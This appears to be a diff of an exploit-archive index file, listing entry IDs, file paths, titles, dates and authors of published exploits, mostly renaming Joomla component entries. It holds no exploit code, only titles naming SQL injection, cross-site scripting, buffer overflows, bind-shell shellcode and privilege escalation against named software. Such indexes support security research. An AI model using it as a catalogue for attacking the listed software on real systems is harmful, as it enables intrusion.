14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0
14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0
14293,platforms/php/webapps/14293.txt,"Joomla! Component Minify4Joomla! - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0
14291,platforms/php/webapps/14291.txt,"Joomla! Component IXXO Cart - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0
14434,platforms/php/webapps/14434.txt,"Joomla! Component com_jomtube - (user_id) Blind SQL Injection / SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 (com_redshop pid) - SQL Injection",2010-07-10,v3n0m,php,webapps,0
14296,platforms/php/webapps/14296.txt,"Joomla! Component QuickFAQ (com_quickfaq) - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0
14293,platforms/php/webapps/14293.txt,"Joomla! Component 'Minify4Joomla' - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0
14291,platforms/php/webapps/14291.txt,"Joomla! Component 'IXXO Cart' - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0
14434,platforms/php/webapps/14434.txt,"Joomla! Component 'com_jomtube' - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0
14312,platforms/php/webapps/14312.txt,"Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0
14296,platforms/php/webapps/14296.txt,"Joomla! Component 'com_quickfaq' - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0
14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps,0
14299,platforms/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0
14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0
@ -12588,22 +12588,22 @@ id,file,description,date,author,platform,type,port
14308,platforms/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
14313,platforms/php/webapps/14313.txt,"Joomla! Component MyHome (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
14315,platforms/php/webapps/14315.txt,"Joomla! Component MySms (com_mysms) - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
14335,platforms/php/webapps/14335.txt,"Joomla! Component Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
14313,platforms/php/webapps/14313.txt,"Joomla! Component 'com_myhome' - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
14315,platforms/php/webapps/14315.txt,"Joomla! Component 'com_mysms' - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
14335,platforms/php/webapps/14335.txt,"Joomla! Component 'healthstats' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
14319,platforms/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,php,webapps,0
14320,platforms/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool - Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact ORGanizer - SQL Injection",2010-07-10,v3n0m,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla! Component Rapid Recipe - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps,0
14327,platforms/php/webapps/14327.txt,"Joomla! Component 'Rapid-Recipe' - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps,0
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
14329,platforms/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
14330,platforms/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0
14336,platforms/php/webapps/14336.txt,"Joomla! Component EasyBlog - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
14336,platforms/php/webapps/14336.txt,"Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14338,platforms/php/webapps/14338.html,"Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
@ -12611,7 +12611,7 @@ id,file,description,date,author,platform,type,port
14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0
14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - (wpd) Buffer Overflow (PoC)",2010-07-12,LiquidWorm,windows,dos,0
14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - (shw) Buffer Preoccupation (PoC)",2010-07-12,LiquidWorm,windows,dos,0
14350,platforms/php/webapps/14350.txt,"Joomla! Component QContacts (com_qcontacts) - SQL Injection",2010-07-13,_mlk_,php,webapps,0
14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0
14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0
14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps,0
14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS ASLR + DEP Bypass) (Metasploit)",2010-07-13,Node,windows,local,0
@ -12623,7 +12623,7 @@ id,file,description,date,author,platform,type,port
14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0
14365,platforms/php/webapps/14365.txt,"Campsite CMS - Remote Persistent Cross-Site Scripting",2010-07-15,D4rk357,php,webapps,0
14366,platforms/php/webapps/14366.txt,"Whizzy CMS 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",php,webapps,0
14368,platforms/php/webapps/14368.txt,"Joomla! Component RedShop 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps,0
14368,platforms/php/webapps/14368.txt,"Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps,0
14369,platforms/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - Cross-Site Scripting",2010-07-15,Markot,jsp,webapps,0
14370,platforms/php/webapps/14370.txt,"BS Scripts Directory - 'info.php' SQL Injection",2010-07-15,D4rk357,php,webapps,0
14371,platforms/php/webapps/14371.txt,"BS Scripts Directory - 'articlesdetails.php' SQL Injection",2010-07-16,k4k4shi,php,webapps,0
@ -12650,8 +12650,8 @@ id,file,description,date,author,platform,type,port
14391,platforms/php/webapps/14391.txt,"Subrion Auto Classifieds - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps,0
14392,platforms/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,php,webapps,0
14393,platforms/php/webapps/14393.txt,"Calendarix - 'cal_cat.php' SQL Injection",2010-07-17,SixP4ck3r,php,webapps,0
14394,platforms/php/webapps/14394.txt,"Joomla! Component com_spa - SQL Injection (2)",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
14395,platforms/php/webapps/14395.txt,"Joomla! Component com_staticxt - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
14394,platforms/php/webapps/14394.txt,"Joomla! Component 'com_spa' - SQL Injection (2)",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
14395,platforms/php/webapps/14395.txt,"Joomla! Component 'com_staticxt' - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0
14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
@ -12672,7 +12672,7 @@ id,file,description,date,author,platform,type,port
14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0
14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script - SQL Injection",2010-07-20,v0calist,asp,webapps,0
14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0
14423,platforms/php/webapps/14423.txt,"Joomla! Component com_spa - SQL Injection (1)",2010-07-20,"ALTBTA ",php,webapps,0
14423,platforms/php/webapps/14423.txt,"Joomla! Component 'com_spa' - SQL Injection (1)",2010-07-20,"ALTBTA ",php,webapps,0
14424,platforms/windows/dos/14424.txt,"Lithtech Engine - Memory Corruption",2010-07-20,"Luigi Auriemma",windows,dos,0
14425,platforms/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",php,webapps,0
14426,platforms/php/webapps/14426.pl,"Imagine-cms 2.50 - SQL Injection",2010-07-21,Metropolis,php,webapps,0
@ -12695,9 +12695,9 @@ id,file,description,date,author,platform,type,port
14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0
14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
14447,platforms/windows/remote/14447.html,"Multiple Web Browser (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component com_huruhelpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component 'com_iproperty' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
@ -12708,37 +12708,37 @@ id,file,description,date,author,platform,type,port
14458,platforms/php/webapps/14458.txt,"sNews - 'index.php' SQL Injection",2010-07-24,MajoR,php,webapps,0
14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps,0
14461,platforms/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps,0
14462,platforms/php/webapps/14462.txt,"Joomla! Component Ozio Gallery (com_oziogallery) - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component ITArmory (com_itarmory) - SQL Injection",2010-07-24,Craw,php,webapps,0
14462,platforms/php/webapps/14462.txt,"Joomla! Component 'com_oziogallery' - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0
14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - '.m3u' Universal Buffer Overflow",2010-07-24,s-dz,windows,local,0
14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component com_joomdle) 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14467,platforms/php/webapps/14467.txt,"Joomla! Component com_youtube - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component 'com_joomdle' 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14467,platforms/php/webapps/14467.txt,"Joomla! Component 'com_youtube' - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0
14470,platforms/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,php,webapps,0
14471,platforms/php/webapps/14471.txt,"CMS Ignition - SQL Injection",2010-07-25,neavorc,php,webapps,0
14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection",2010-07-25,"Salvatore Fresta",php,webapps,0
14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps,0
14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0
14476,platforms/php/webapps/14476.txt,"Joomla! Component com_Joomla-visites - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
14476,platforms/php/webapps/14476.txt,"Joomla! Component 'com_Joomla-visites' - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/Denial of Service",2010-07-26,"Praveen Darshanam",windows,dos,0
14481,platforms/php/webapps/14481.txt,"Joomla! Component TTVideo 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0
14481,platforms/php/webapps/14481.txt,"Joomla! Component 'com_ttvideo' 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0
14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow",2010-07-27,"Lufeng Li",windows,local,0
14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
14488,platforms/php/webapps/14488.txt,"Joomla! Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
14488,platforms/php/webapps/14488.txt,"Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps,0
14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0
14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0
14495,platforms/php/webapps/14495.txt,"Joomla! Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0
14495,platforms/php/webapps/14495.txt,"Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0
14499,platforms/php/webapps/14499.txt,"Joomla! Component 'com_pbbooking' 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0
14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0
14501,platforms/php/webapps/14501.txt,"Joomla! Component 'com_SimpleShop' - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0
14502,platforms/php/webapps/14502.txt,"Joomla! Component com_beamospetition - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0
14502,platforms/php/webapps/14502.txt,"Joomla! Component 'com_beamospetition' - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0
14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local,0
14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0
14505,platforms/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Buffer Overflow (SEH)",2010-07-30,loneferret,windows,remote,0
@ -13929,7 +13929,7 @@ id,file,description,date,author,platform,type,port
16072,platforms/windows/local/16072.py,"WM Downloader 3.1.2.2 2010.04.15 - '.m3u' Buffer Overflow (DEP Bypass)",2011-01-29,sickness,windows,local,0
16073,platforms/windows/local/16073.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow (SEH)",2011-01-29,m0nna,windows,local,0
16074,platforms/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,php,webapps,0
16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Remote File Download",2011-01-29,"Zer0 Thunder",windows,remote,0
16075,platforms/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download",2011-01-29,"Zer0 Thunder",windows,remote,0
16076,platforms/php/webapps/16076.txt,"vBSEO 3.5.2 / 3.2.2 - Persistent Cross-Site Scripting via LinkBacks",2011-01-30,MaXe,php,webapps,0
16077,platforms/php/webapps/16077.txt,"vBSEO Sitemap 2.5 / 3.0 - Multiple Vulnerabilities",2011-01-30,MaXe,php,webapps,0
16078,platforms/windows/remote/16078.py,"SDP Downloader 2.3.0 - (http_response) Remote Buffer Overflow",2011-01-30,sup3r,windows,remote,0
@ -15056,7 +15056,7 @@ id,file,description,date,author,platform,type,port
17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0
17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
17303,platforms/php/webapps/17303.txt,"Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0
17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0
17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
@ -21150,7 +21150,7 @@ id,file,description,date,author,platform,type,port
23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0
23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 - Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0
23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0
23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Remote File Download",2004-04-01,"Donato Ferrante",windows,remote,0
23906,platforms/windows/remote/23906.txt,"ADA IMGSVR 0.4 - Arbitrary File Download",2004-04-01,"Donato Ferrante",windows,remote,0
23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum - Arbitrary Command Execution",2004-04-03,K-159,cgi,webapps,0
23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 - myhome.php SQL Injection",2004-04-05,"Mark Tesn",php,webapps,0
23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal",2004-04-05,dr_insane,windows,remote,0
@ -28039,7 +28039,7 @@ id,file,description,date,author,platform,type,port
31074,platforms/php/webapps/31074.txt,"Nucleus CMS 3.22 - 'action.php' Cross-Site Scripting",2008-01-20,"Alexandr Polyakov",php,webapps,0
31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 - 'index.php' Cross-Site Scripting",2008-01-29,ShaFuck31,php,webapps,0
31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 - 'demux_mov.c' Remote Code Execution",2008-02-04,"Felipe Manzano",linux,remote,0
31077,platforms/php/webapps/31077.txt,"Joomla! / Mambo Component com_buslicense - 'aid' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0
31077,platforms/php/webapps/31077.txt,"Joomla! / Mambo Component 'com_buslicense' - 'aid' Parameter SQL Injection",2008-01-30,S@BUN,php,webapps,0
31078,platforms/hardware/remote/31078.txt,"2WIRE Routers - 'H04_POST' Access Validation",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting",2008-01-30,NBBN,php,webapps,0
31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection",2008-01-30,ShaFuck31,php,webapps,0
@ -28080,7 +28080,7 @@ id,file,description,date,author,platform,type,port
31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 - File Converter Field Length Remote Code Execution",2008-02-06,"Luigi Auriemma",windows,remote,0
31119,platforms/multiple/remote/31119.txt,"TinTin++ / WinTin++ 1.97.9 - '#chat' Command Multiple Security Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0
31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-07,"Alexandr Polyakov",php,webapps,0
31121,platforms/php/webapps/31121.txt,"Joomla! / Mambo Component com_sermon 0.2 - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0
31121,platforms/php/webapps/31121.txt,"Joomla! / Mambo Component 'com_sermon' 0.2 - 'gid' Parameter SQL Injection",2008-02-07,S@BUN,php,webapps,0
31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 - 'subpage' Parameter Multiple Local File Inclusion",2008-02-08,"Alexandr Polyakov",php,webapps,0
31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0
@ -28096,7 +28096,7 @@ id,file,description,date,author,platform,type,port
31134,platforms/php/webapps/31134.txt,"VWar 1.5 - 'calendar.php' SQL Injection",2008-02-11,Pouya_Server,php,webapps,0
31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component - Multiple SQL Injections",2008-02-11,breaker_unit,php,webapps,0
31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0
31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' Parameter SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0
31137,platforms/php/webapps/31137.txt,"Joomla! / Mambo Component 'com_comments' 0.5.8.5g - 'id' Parameter SQL Injection",2008-02-11,CheebaHawk215,php,webapps,0
31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
31140,platforms/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps,0
@ -28114,7 +28114,7 @@ id,file,description,date,author,platform,type,port
31152,platforms/php/webapps/31152.txt,"artmedic weblog - artmedic_print.php date Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
31153,platforms/php/webapps/31153.txt,"artmedic weblog - 'index.php' jahrneu Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0
31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component com_iomezun - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
31157,platforms/php/webapps/31157.txt,"Cacti 0.8.7 - graph.php view_type Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0
31158,platforms/php/webapps/31158.txt,"Cacti 0.8.7 - graph_view.php filter Parameter Cross-Site Scripting",2008-02-12,aScii,php,webapps,0
@ -28147,9 +28147,9 @@ id,file,description,date,author,platform,type,port
31182,platforms/windows/local/31182.txt,"Ammyy Admin 3.2 - Authentication Bypass",2014-01-24,"Bhadresh Patel",windows,local,0
31183,platforms/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80
31305,platforms/linux/dos/31305.c,"Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC (1)",2014-01-31,"Kees Cook",linux,dos,0
31272,platforms/php/webapps/31272.txt,"Joomla! / Mambo Component com_Joomlavvz - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0
31273,platforms/php/webapps/31273.txt,"Joomla! / Mambo Component com_most - 'secid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
